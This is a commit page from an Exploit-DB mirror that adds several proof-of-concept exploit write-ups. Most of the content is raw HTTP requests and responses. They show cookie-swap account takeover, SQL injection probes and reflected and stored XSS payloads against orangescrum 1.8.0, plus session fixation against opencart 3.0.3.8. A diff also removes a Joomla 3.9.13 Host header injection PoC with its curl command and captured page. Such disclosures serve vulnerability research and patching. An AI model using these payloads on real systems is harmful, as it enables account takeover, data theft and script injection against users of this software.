bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-11-30

Browse source 
7 changes to exploits/shellcodes

Joomla! 3.9.13 - 'Host' Header Injection
orangescrum 1.8.0 - Privilege escalation (Authenticated)
orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)
opencart 3.0.3.8 - Sessjion Injection
This commit is contained in:
Offensive Security 2021-11-30 05:02:04 +00:00
parent c60e7e2012
commit 897c47e020
7 changed files with 359 additions and 240 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
exploits/multiple/webapps/50551.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### Privilege escalation
# The user must be assigned to the project with the account he wants to take over
# The vulnerabilities in the application allow for:
* Taking over any account with which the project is assigned
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example
1. Go to the dashboard
2. Go to the page source view
3. Find in source "var PUSERS"
4. Copy "uniq_id" victim
5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source
6. After refreshing the page, you are logged in to the victim's account

133
exploits/multiple/webapps/50553.txt Normal file
View file

@ -0,0 +1,133 @@
# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### SQL Injection
# Authenticated user
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example vuln parameters:
* project_id
* old_project_id
* uuid
* uniqid
* projid
* id
* caseno
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
## Example
-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1' - error
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 64
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty
project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 500 Internal Server Error
Date: Sun, 28 Nov 2021 12:42:30 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Content-Length: 132182
Vary: User-Agent
Expires: access 12 month
Connection: close
[...]
-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1'' - not error
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 66
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty
project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0
-----------------------------------------------------------------------------------------------------------------------
Res
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 12:51:23 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
0

133
exploits/multiple/webapps/50554.txt Normal file
View file

@ -0,0 +1,133 @@
# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Reflected
# Authenticated user
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example XSS Reflected
Param: projid
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/edit_reply HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script>
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:28:57 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Content-Length: 1114
Vary: User-Agent
Expires: access 12 month
Connection: close
Content-Type: text/html; charset=UTF-8
<table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12">
<tr>
<td>
<textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12">
xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb </textarea>
</td>
</tr>
<tr>
<td align="right">
<div id="edit_btn5" class="fr">
<button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b
[...]
## Example XSS Stored
Example vuln paraMETERS:
* CS_message
* name
* data[User][email]
-----------------------------------------------------------------------------------------------------------------------
Param: CS_message
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/ajaxpostcase HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 393
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c
Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:51:29 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 698
Connection: close
Content-Type: text/html; charset=UTF-8
{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)>
[...]

237
exploits/php/webapps/47632.txt
View file

@ -1,237 +0,0 @@
# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
# Author: Pablo Santiago
# Date: 2019-11-12
# Vendor Homepage: https://www.joomla.org/
# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
# Version: 3.9.13
# CVE : N/A
# Tested on: Windows 10
#PoC
curl http://localhost/joomla/ -H "Host: exploit-db.com"
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://exploit-db.com/joomla/" />
<meta name="description" content="javacript:alert(document.cookie)" />
<meta name="generator" content="Joomla! - Open Source Content
Management" />
<title>Home</title>
<link href="/joomla/index.php?format=feed&type=rss"
rel="alternate" type="application/rss+xml" title="RSS 2.0" />
<link href="/joomla/index.php?format=feed&type=atom"
rel="alternate" type="application/atom+xml" title="Atom 1.0" />
<link href="/joomla/templates/protostar/favicon.ico"
rel="shortcut icon" type="image/vnd.microsoft.icon" />
<link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
rel="stylesheet" />
<link href="https://fonts.googleapis.com/css?family=Open+Sans"
rel="stylesheet" />
<style>
h1, h2, h3, h4, h5, h6, .site-title {
font-family: 'Open Sans', sans-serif;
}
</style>
<script type="application/json" class="joomla-script-options
new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
<script
src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
<script>
jQuery(window).on('load', function() {
new JCaption('img.caption');
jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
initTooltips); function initTooltips (event, container) { container =
container || document;$(container).find(".hasTooltip").tooltip({"html":
true,"container": "body"});} });
</script>
</head>
<body class="site com_content view-featured no-layout no-task itemid-101">
<!-- Body -->
<div class="body" id="top">
<div class="container">
<!-- Header -->
<header class="header" role="banner">
<div class="header-inner clearfix">
<a class="brand pull-left"
href="/joomla/">
<span
class="site-title"
title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
</a>
<div class="header-search pull-right">
</div>
</div>
</header>
<div class="row-fluid">
<main
id="content" role="main" class="span9">
<!-- Begin Content -->
<div id="system-message-container">
</div>
<div class="blog-featured"
itemscope itemtype="https://schema.org/Blog">
<div class="page-header">
<h1>
Home </h1>
</div>
</div>
<div class="clearfix"></div>
<div aria-label="breadcrumbs"
role="navigation">
<ul itemscope itemtype="https://schema.org/BreadcrumbList"
class="breadcrumb">
<li>
You are here: &#160;
</li>
<li
itemprop="itemListElement" itemscope
itemtype="https://schema.org/ListItem" class="active">
<span itemprop="name">
Home
</span>
<meta itemprop="position" content="1">
</li>
</ul>
</div>
<!-- End Content -->
</main>
<div id="aside" class="span3">
<!-- Begin Right Sidebar -->
<div class="well
_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
mod-list">
<li class="item-101 default current active"><a
href="/joomla/index.php" >Home</a></li></ul>
</div><div class="well "><h3 class="page-header">Login Form</h3><form
action="/joomla/index.php" method="post" id="login-form"
class="form-inline">
<div class="userdata">
<div id="form-login-username" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-user hasTooltip" title="Username"></span>
<label
for="modlgn-username" class="element-invisible">Username</label>
</span>
<input
id="modlgn-username" type="text" name="username" class="input-small"
tabindex="0" size="18" placeholder="Username" />
</div>
</div>
</div>
<div id="form-login-password" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-lock hasTooltip" title="Password">
</span>
<label
for="modlgn-passwd" class="element-invisible">Password
</label>
</span>
<input
id="modlgn-passwd" type="password" name="password" class="input-small"
tabindex="0" size="18" placeholder="Password" />
</div>
</div>
</div>
<div
id="form-login-remember" class="control-group checkbox">
<label for="modlgn-remember"
class="control-label">Remember Me</label> <input id="modlgn-remember"
type="checkbox" name="remember" class="inputbox" value="yes"/>
</div>
<div id="form-login-submit"
class="control-group">
<div class="controls">
<button type="submit" tabindex="0"
name="Submit" class="btn btn-primary login-button">Log in</button>
</div>
</div>
<ul class="unstyled">
<li>
<a
href="/joomla/index.php/component/users/?view=remind&Itemid=101">
Forgot your username?</a>
</li>
<li>
<a
href="/joomla/index.php/component/users/?view=reset&Itemid=101">
Forgot your password?</a>
</li>
</ul>
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return"
value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
<input type="hidden"
name="d460ac322fbbb6ae67cc78034182d9e1" value="1" /> </div>
</form>
</div>
<!-- End Right Sidebar -->
</div>
</div>
</div>
</div>
<!-- Footer -->
<footer class="footer" role="contentinfo">
<div class="container">
<hr />
<p class="pull-right">
<a href="#top" id="back-top">
Back to Top
</a>
</p>
<p>
&copy; 2019
javacript:alert(document.cookie) </p>
</div>
</footer>
</body>
</html>
#PoC Visual
https://imgur.com/a/IgO4ZxI

4
exploits/php/webapps/50439.py
View file

@ -8,8 +8,8 @@
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e # References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
# Vulnerability: Through SQL injection to bypass the login form it is # Vulnerability: Through SQL injection to bypass the login form it is
possible to upload a malicious file and after use that malicious file to # possible to upload a malicious file and after use that malicious file to
execute code in the remote system. # execute code in the remote system.
# Proof of Concept: # Proof of Concept:
import requests import requests

57
exploits/php/webapps/50555.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: opencart 3.0.3.8 - Sessjion Injection
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/
# Version: 3.0.3.8
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### Sessjion Fixation / injection
Session cookie "OCSESSID" is inproperly processed
Attacker can set any value cookie and server set this value
Becouse of that sesssion injection and session fixation vulnerability
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example
Modify cookie "OCSESSID" value:
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/opencart-3.0.3.8/
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Server set atttacker value:
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 15:16:06 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: PHP/8.0.11
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18944
[...]

5
files_exploits.csv
View file

@ -42964,7 +42964,6 @@ id,file,description,date,author,type,platform,port
47628,exploits/hardware/webapps/47628.txt,"CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)",1970-01-01,LiquidWorm,webapps,hardware, 47628,exploits/hardware/webapps/47628.txt,"CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)",1970-01-01,LiquidWorm,webapps,hardware,
47630,exploits/hardware/webapps/47630.txt,"CBAS-Web 19.0.0 - Username Enumeration",1970-01-01,LiquidWorm,webapps,hardware, 47630,exploits/hardware/webapps/47630.txt,"CBAS-Web 19.0.0 - Username Enumeration",1970-01-01,LiquidWorm,webapps,hardware,
47631,exploits/php/webapps/47631.txt,"CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection",1970-01-01,LiquidWorm,webapps,php, 47631,exploits/php/webapps/47631.txt,"CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection",1970-01-01,LiquidWorm,webapps,php,
47632,exploits/php/webapps/47632.txt,"Joomla! 3.9.13 - 'Host' Header Injection",1970-01-01,"Pablo Santiago",webapps,php,
47633,exploits/alpha/webapps/47633.txt,"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting",1970-01-01,LiquidWorm,webapps,alpha, 47633,exploits/alpha/webapps/47633.txt,"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting",1970-01-01,LiquidWorm,webapps,alpha,
47634,exploits/hardware/webapps/47634.txt,"Prima Access Control 2.3.35 - Arbitrary File Upload",1970-01-01,LiquidWorm,webapps,hardware, 47634,exploits/hardware/webapps/47634.txt,"Prima Access Control 2.3.35 - Arbitrary File Upload",1970-01-01,LiquidWorm,webapps,hardware,
47635,exploits/jsp/webapps/47635.rb,"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)",1970-01-01,max7253,webapps,jsp, 47635,exploits/jsp/webapps/47635.rb,"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)",1970-01-01,max7253,webapps,jsp,
@ -44641,3 +44640,7 @@ id,file,description,date,author,type,platform,port
50544,exploits/multiple/webapps/50544.txt,"FLEX 1085 Web 1.6.0 - HTML Injection",1970-01-01,"Mr Empy",webapps,multiple, 50544,exploits/multiple/webapps/50544.txt,"FLEX 1085 Web 1.6.0 - HTML Injection",1970-01-01,"Mr Empy",webapps,multiple,
50547,exploits/php/webapps/50547.py,"CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)",1970-01-01,S1lv3r,webapps,php, 50547,exploits/php/webapps/50547.py,"CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)",1970-01-01,S1lv3r,webapps,php,
